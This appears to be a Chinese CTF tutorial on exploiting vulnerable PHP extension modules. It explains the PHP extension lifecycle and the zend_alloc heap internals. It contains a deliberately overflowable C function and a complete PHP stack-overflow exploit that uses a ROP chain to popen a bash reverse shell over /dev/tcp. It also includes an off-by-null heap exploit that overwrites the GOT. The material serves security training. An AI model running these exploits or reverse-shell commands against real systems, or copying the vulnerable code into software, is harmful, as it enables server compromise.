PHP PWN入门：栈溢出与堆机制详解<\/h1>

1. Web PWN简介<\/h2>
Web PWN主要针对PHP应用，重点分析PHP加载的外部拓展(so拓展库)。与常规PWN题不同，由于PHP加载扩展库调用内部函数，通常无法直接获得交互式shell。通常需要采用`popen<\/code>或exec<\/code>函数族执行bash命令来反弹shell，直接执行one_gadget<\/code>或system<\/code>通常不可行。<\/p>`

2. PHP扩展模块生命周期<\/h2>
2.1 生命周期阶段<\/h3>


Module Init (MINIT)<\/strong>:<\/p>

PHP解释器启动时调用，仅一次<\/li>
示例：初始化数据库连接池<\/li>
<\/ul>
<\/li>

Request Init (RINIT)<\/strong>:<\/p>

每个请求到达时触发<\/li>
示例：为每个请求创建新会话<\/li>
<\/ul>
<\/li>

Request Shutdown (RSHUTDOWN)<\/strong>:<\/p>

请求结束时调用<\/li>
示例：清理请求期间分配的资源<\/li>
<\/ul>
<\/li>

Module Shutdown (MSHUTDOWN)<\/strong>:<\/p>

服务器关闭时调用<\/li>
示例：关闭数据库连接池<\/li>
<\/ul>
<\/li>
<\/ol>
2.2 PHP运行模式<\/h3>


CLI运行模式<\/strong> (单进程SAPI):<\/p>

示例：php script.php<\/code><\/li>
整个进程生命周期：MINIT → RINIT → Execute → RSHUTDOWN → MSHUTDOWN<\/li>
<\/ul>
<\/li>

CGI运行模式<\/strong> (多进程SAPI):<\/p>

示例：Apache with mod_cgi<\/li>
每个请求fork新PHP进程，完整生命周期<\/li>
<\/ul>
<\/li>

FastCGI运行模式<\/strong> (多进程SAPI，进程可复用):<\/p>

示例：Nginx with PHP-FPM<\/li>
进程处理多个请求后退出<\/li>
<\/ul>
<\/li>
<\/ol>
3. PHP扩展模块开发<\/h2>
3.1 环境搭建<\/h3>
sudo apt install php php-dev  # 安装php及开发包<\/span>
<\/span><\/span>git clone https:\/\/github.com\/php\/php-src.git
<\/span><\/span>cd php-src
<\/span><\/span>git checkout PHP-7.4.3
<\/span><\/span><\/code><\/pre>3.2 源码目录结构<\/h3>

build\/<\/code>: 编译相关<\/li>
ext\/<\/code>: 扩展库代码<\/li>
main\/<\/code>: PHP主要宏定义<\/li>
sapi\/<\/code>: 服务器接口<\/li>
Zend\/<\/code>: Zend引擎相关<\/li>
<\/ul>
3.3 创建扩展模块<\/h3>
cd ext
<\/span><\/span>php ext_skel.php --ext extend_name
<\/span><\/span><\/code><\/pre>生成的文件：<\/p>

config.m4<\/code>: Unix-like系统配置脚本<\/li>
config.w32<\/code>: Windows系统配置脚本<\/li>
hello.c<\/code>: 扩展主要源代码<\/li>
php_hello.h<\/code>: 扩展头文件<\/li>
tests\/<\/code>: 测试文件目录<\/li>
<\/ul>
3.4 扩展模块结构<\/h3>
PHP扩展在C层面是zend_module_entry<\/code>结构体：<\/p>
struct<\/span> _zend_module_entry {
<\/span><\/span>    unsigned<\/span> short<\/span> size;
<\/span><\/span>    const<\/span> char<\/span> *<\/span>name;          \/\/ 扩展名
<\/span><\/span><\/span><\/span>    const<\/span> struct<\/span> _zend_function_entry *<\/span>functions; \/\/ 函数引用
<\/span><\/span><\/span><\/span>    int<\/span> (*<\/span>module_startup_func)(INIT_FUNC_ARGS);  \/\/ 模块加载时调用
<\/span><\/span><\/span><\/span>    int<\/span> (*<\/span>module_shutdown_func)(SHUTDOWN_FUNC_ARGS); \/\/ 模块卸载时调用
<\/span><\/span><\/span><\/span>    int<\/span> (*<\/span>request_startup_func)(INIT_FUNC_ARGS); \/\/ 请求开始时调用
<\/span><\/span><\/span><\/span>    int<\/span> (*<\/span>request_shutdown_func)(SHUTDOWN_FUNC_ARGS); \/\/ 请求结束时调用
<\/span><\/span><\/span><\/span>    void<\/span> (*<\/span>info_func)(ZEND_MODULE_INFO_FUNC_ARGS); \/\/ phpinfo()时调用
<\/span><\/span><\/span><\/span>    const<\/span> char<\/span> *<\/span>version;       \/\/ 模块版本
<\/span><\/span><\/span><\/span>    \/\/ ...其他字段
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>3.5 函数定义与参数解析<\/h3>
PHP_FUNCTION(easy_phppwn) {
<\/span><\/span>    char<\/span> *<\/span>arg =<\/span> NULL;
<\/span><\/span>    size_t arg_len;
<\/span><\/span>    char<\/span> buf[100<\/span>];
<\/span><\/span>    
<\/span><\/span>    \/\/ 解析参数
<\/span><\/span><\/span><\/span>    if<\/span> (zend_parse_parameters(ZEND_NUM_ARGS(), "s"<\/span>, &<\/span>arg, &<\/span>arg_len) ==<\/span> FAILURE) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    memcpy(buf, arg, arg_len);  \/\/ 栈溢出漏洞点
<\/span><\/span><\/span><\/span>    php_printf("The baby phppwn.<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    return<\/span> SUCCESS;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>参数类型标识符：<\/p>

s<\/code>: 字符串(带长度)<\/li>
l<\/code>: 长整型<\/li>
d<\/code>: 双精度浮点<\/li>
a<\/code>: 数组<\/li>
o<\/code>: 对象<\/li>
z<\/code>: 实际zval<\/li>
<\/ul>
3.6 编译扩展<\/h3>
phpize
<\/span><\/span>.\/configure --with-php-config=<\/span>\/usr\/bin\/php-config
<\/span><\/span># 修改Makefile取消栈保护和优化<\/span>
<\/span><\/span>make
<\/span><\/span>sudo cp hello.so \/usr\/lib\/php\/20190902\/
<\/span><\/span><\/code><\/pre>4. 栈溢出利用<\/h2>
4.1 漏洞分析<\/h3>
void<\/span> __cdecl<\/span> zif_easy_phppwn<\/span>(zend_execute_data *<\/span>execute_data, zval *<\/span>return_value) {
<\/span><\/span>    char<\/span> buf[100<\/span>];  \/\/ 栈缓冲区
<\/span><\/span><\/span><\/span>    size_t n;
<\/span><\/span>    char<\/span> *<\/span>arg;
<\/span><\/span>    
<\/span><\/span>    if<\/span> ((unsigned<\/span> int<\/span>)zend_parse_parameters(\/*...*\/<\/span>, "s"<\/span>, &<\/span>arg, &<\/span>n) !=<\/span> -<\/span>1<\/span>) {
<\/span><\/span>        memcpy(buf, arg, n);  \/\/ 无长度检查导致栈溢出
<\/span><\/span><\/span><\/span>        php_printf("The baby phppwn.<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 利用技术<\/h3>


内存泄露<\/strong>:<\/p>

通过\/proc\/self\/maps<\/code>泄露内存布局<\/li>
示例PHP代码：
$content =<\/span> file_get_contents<\/span>('\/proc\/self\/maps'<\/span>);
<\/span><\/span>echo<\/span> $content;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

ROP链构造<\/strong>:<\/p>

泄露libc地址后构造ROP链<\/li>
使用mprotect<\/code>修改栈权限后执行shellcode<\/li>
<\/ul>
<\/li>

反弹shell<\/strong>:<\/p>

常用方法：
$cmd =<\/span> 'bash -c "bash -i >& \/dev\/tcp\/127.0.0.1\/6666 0>&1"'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
4.3 完整利用示例<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> i2s<\/span>($i, $x=<\/span>8<\/span>) {
<\/span><\/span>    $re =<\/span> ""<\/span>;
<\/span><\/span>    for<\/span>($j=<\/span>0<\/span>; $j<<\/span>$x; $j++<\/span>) {
<\/span><\/span>        $re .=<\/span> chr<\/span>($i &<\/span> 0xff<\/span>);
<\/span><\/span>        $i >>=<\/span> 8<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $re;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 读取内存布局
<\/span><\/span><\/span><\/span>$content =<\/span> file_get_contents<\/span>('\/proc\/self\/maps'<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 解析libc基地址
<\/span><\/span><\/span><\/span>preg_match_all<\/span>('\/^([0-9a-f]+)-[0-9a-f]+\\s+r--p\\s+.*?\\s+\\S*libc.*$\/m'<\/span>, $content, $matches);
<\/span><\/span>$libc_base =<\/span> hexdec<\/span>($matches[1<\/span>][0<\/span>]);
<\/span><\/span>
<\/span><\/span>\/\/ 构造payload
<\/span><\/span><\/span><\/span>$p_rdi_r =<\/span> $libc_base +<\/span> 0x23b6a<\/span>;
<\/span><\/span>$p_rsi_r =<\/span> $libc_base +<\/span> 0x2601f<\/span>;
<\/span><\/span>$popen_addr =<\/span> $libc_base +<\/span> 0x84380<\/span>;
<\/span><\/span>$command =<\/span> '\/bin\/bash -c "\/bin\/bash -i >&\/dev\/tcp\/127.0.0.1\/6666 0>&1"'<\/span>;
<\/span><\/span>
<\/span><\/span>$buf1 =<\/span> str_repeat<\/span>('a'<\/span>, 0x80<\/span>);
<\/span><\/span>$buf =<\/span> str_repeat<\/span>('b'<\/span>, 0x8<\/span>) .<\/span> pack<\/span>('Q'<\/span>, $p_rdi_r) .<\/span> pack<\/span>('Q'<\/span>, $stack_addr);
<\/span><\/span>$buf .=<\/span> pack<\/span>('Q'<\/span>, $p_rsi_r) .<\/span> pack<\/span>('Q'<\/span>, $stack_addr -<\/span> 0x18<\/span>);
<\/span><\/span>$buf .=<\/span> pack<\/span>('Q'<\/span>, $popen_addr) .<\/span> "r"<\/span> .<\/span> str_repeat<\/span>("<\/span>\x00<\/span>"<\/span>, 7<\/span>);
<\/span><\/span>$buf =<\/span> str_pad<\/span>($buf, 0x50<\/span>, 'c'<\/span>);
<\/span><\/span>$buf .=<\/span> str_pad<\/span>($command, 0x60<\/span>, "<\/span>\x00<\/span>"<\/span>) .<\/span> str_repeat<\/span>('\x00'<\/span>, 8<\/span>);
<\/span><\/span>$payload =<\/span> $buf1 .<\/span> $buf;
<\/span><\/span>
<\/span><\/span>easy_phppwn<\/span>($payload);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>5. PHP堆机制<\/h2>
5.1 内存分配概述<\/h3>
PHP使用zend_alloc<\/code>进行内存管理：<\/p>

CHUNK<\/strong>: 2MB内存块<\/li>
PAGE<\/strong>: 4KB内存页<\/li>
Small分配<\/strong>: 小于3\/4页大小(≤3072字节)<\/li>
Large分配<\/strong>: 多个4KB页(≤2MB-4KB)<\/li>
Huge分配<\/strong>: 大于2MB，使用mmap<\/li>
<\/ul>
5.2 小内存分配<\/h3>


分配流程<\/strong>:<\/p>

_emalloc<\/code> → zend_mm_alloc_heap<\/code> → zend_mm_alloc_small<\/code><\/li>
根据大小计算bin索引(30个预定义大小:8,16,24,...,3072)<\/li>
从对应bin的free_slot链表分配<\/li>
<\/ul>
<\/li>

初始化bin<\/strong>:<\/p>
zend_mm_alloc_small_slow() {
<\/span><\/span>    \/\/ 分配页面
<\/span><\/span><\/span><\/span>    bin =<\/span> zend_mm_alloc_pages(heap, bin_pages[bin_num]);
<\/span><\/span>    \/\/ 初始化链表
<\/span><\/span><\/span><\/span>    p =<\/span> (zend_mm_free_slot*<\/span>)((char<\/span>*<\/span>)bin +<\/span> bin_data_size[bin_num]);
<\/span><\/span>    do<\/span> {
<\/span><\/span>        p-><\/span>next_free_slot =<\/span> (zend_mm_free_slot*<\/span>)((char<\/span>*<\/span>)p +<\/span> bin_data_size[bin_num]);
<\/span><\/span>        p =<\/span> (zend_mm_free_slot*<\/span>)((char<\/span>*<\/span>)p +<\/span> bin_data_size[bin_num]);
<\/span><\/span>    } while<\/span>(p !=<\/span> end);
<\/span><\/span>    return<\/span> bin;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

释放流程<\/strong>:<\/p>
zend_mm_free_small(heap, ptr, bin_num) {
<\/span><\/span>    p =<\/span> (zend_mm_free_slot*<\/span>)ptr;
<\/span><\/span>    p-><\/span>next_free_slot =<\/span> heap-><\/span>free_slot[bin_num];
<\/span><\/span>    heap-><\/span>free_slot[bin_num] =<\/span> p;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5.3 堆漏洞利用<\/h3>


利用条件<\/strong>:<\/p>

存在溢出可修改相邻chunk的fd指针<\/li>
无double free检查<\/li>
<\/ul>
<\/li>

利用步骤<\/strong>:<\/p>

选择未初始化bin的size<\/li>
通过off-by-null修改链表指针<\/li>
任意地址分配<\/li>
覆盖GOT表<\/li>
<\/ul>
<\/li>

示例利用(off-by-null)<\/strong>:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 泄露地址
<\/span><\/span><\/span><\/span>leak<\/span>();
<\/span><\/span>
<\/span><\/span>\/\/ 第一次分配，利用off-by-null
<\/span><\/span><\/span><\/span>addHacker<\/span>(str_repeat<\/span>("<\/span>\x11<\/span>"<\/span>, 0x8<\/span>), str_repeat<\/span>("<\/span>\x11<\/span>"<\/span>, 0x30<\/span>));
<\/span><\/span>
<\/span><\/span>\/\/ 修改指针
<\/span><\/span><\/span><\/span>addHacker<\/span>(str_pad<\/span>(p64<\/span>($module_base +<\/span> 0x4038<\/span>).<\/span>p64<\/span>(0xff<\/span>), 0x40<\/span>, "<\/span>\x11<\/span>"<\/span>), 
<\/span><\/span>          str_repeat<\/span>("<\/span>\x11<\/span>"<\/span>, 0x2f<\/span>));
<\/span><\/span>
<\/span><\/span>\/\/ 覆盖GOT
<\/span><\/span><\/span><\/span>addHacker<\/span>(str_pad<\/span>($cmd, 0x40<\/span>, "<\/span>\x00<\/span>"<\/span>), "1"<\/span>);
<\/span><\/span>editHacker<\/span>(0<\/span>, p64<\/span>($libc_base +<\/span> 0x4c411<\/span>));
<\/span><\/span>removeHacker<\/span>(2<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
6. 调试技巧<\/h2>


GDB调试<\/strong>:<\/p>
gdb php
<\/span><\/span>b *zif_easy_phppwn
<\/span><\/span>set args .\/pwn.php
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>

Docker调试<\/strong>:<\/p>
gdbserver :1234 \/usr\/local\/bin\/php \/var\/www\/html\/exp.php
<\/span><\/span><\/code><\/pre><\/li>

内存布局查看<\/strong>:<\/p>
$content =<\/span> file_get_contents<\/span>('\/proc\/self\/maps'<\/span>);
<\/span><\/span>echo<\/span> $content;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
7. 实用PHP函数<\/h2>
\/\/ 64位打包
<\/span><\/span><\/span><\/span>function<\/span> p64<\/span>($addr) {
<\/span><\/span>    return<\/span> strrev<\/span>(pack<\/span>('Q'<\/span>, $addr));
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 64位解包
<\/span><\/span><\/span><\/span>function<\/span> u64<\/span>($leak) {
<\/span><\/span>    return<\/span> unpack<\/span>('Q'<\/span>, strrev<\/span>($leak))[1<\/span>];
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 字符串转整数
<\/span><\/span><\/span><\/span>function<\/span> s2i<\/span>($s) {
<\/span><\/span>    $result =<\/span> 0<\/span>;
<\/span><\/span>    for<\/span>($x=<\/span>0<\/span>; $x<<\/span>strlen<\/span>($s); $x++<\/span>) {
<\/span><\/span>        $result <<=<\/span> 8<\/span>;
<\/span><\/span>        $result |=<\/span> ord<\/span>($s[$x]);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $result;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 整数转字符串
<\/span><\/span><\/span><\/span>function<\/span> i2s<\/span>($i, $x=<\/span>8<\/span>) {
<\/span><\/span>    $re =<\/span> ""<\/span>;
<\/span><\/span>    for<\/span>($j=<\/span>0<\/span>; $j<<\/span>$x; $j++<\/span>) {
<\/span><\/span>        $re .=<\/span> chr<\/span>($i &<\/span> 0xff<\/span>);
<\/span><\/span>        $i >>=<\/span> 8<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $re;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>8. 总结<\/h2>
PHP PWN的关键点：<\/p>

理解PHP扩展生命周期和运行模式<\/li>
掌握栈溢出漏洞的发现与利用<\/li>
熟悉PHP特有的堆管理机制<\/li>
熟练使用\/proc\/self\/maps<\/code>泄露内存布局<\/li>
掌握PHP环境下的ROP构造技巧<\/li>
了解off-by-null等堆漏洞在PHP环境下的利用方法<\/li>
<\/ol>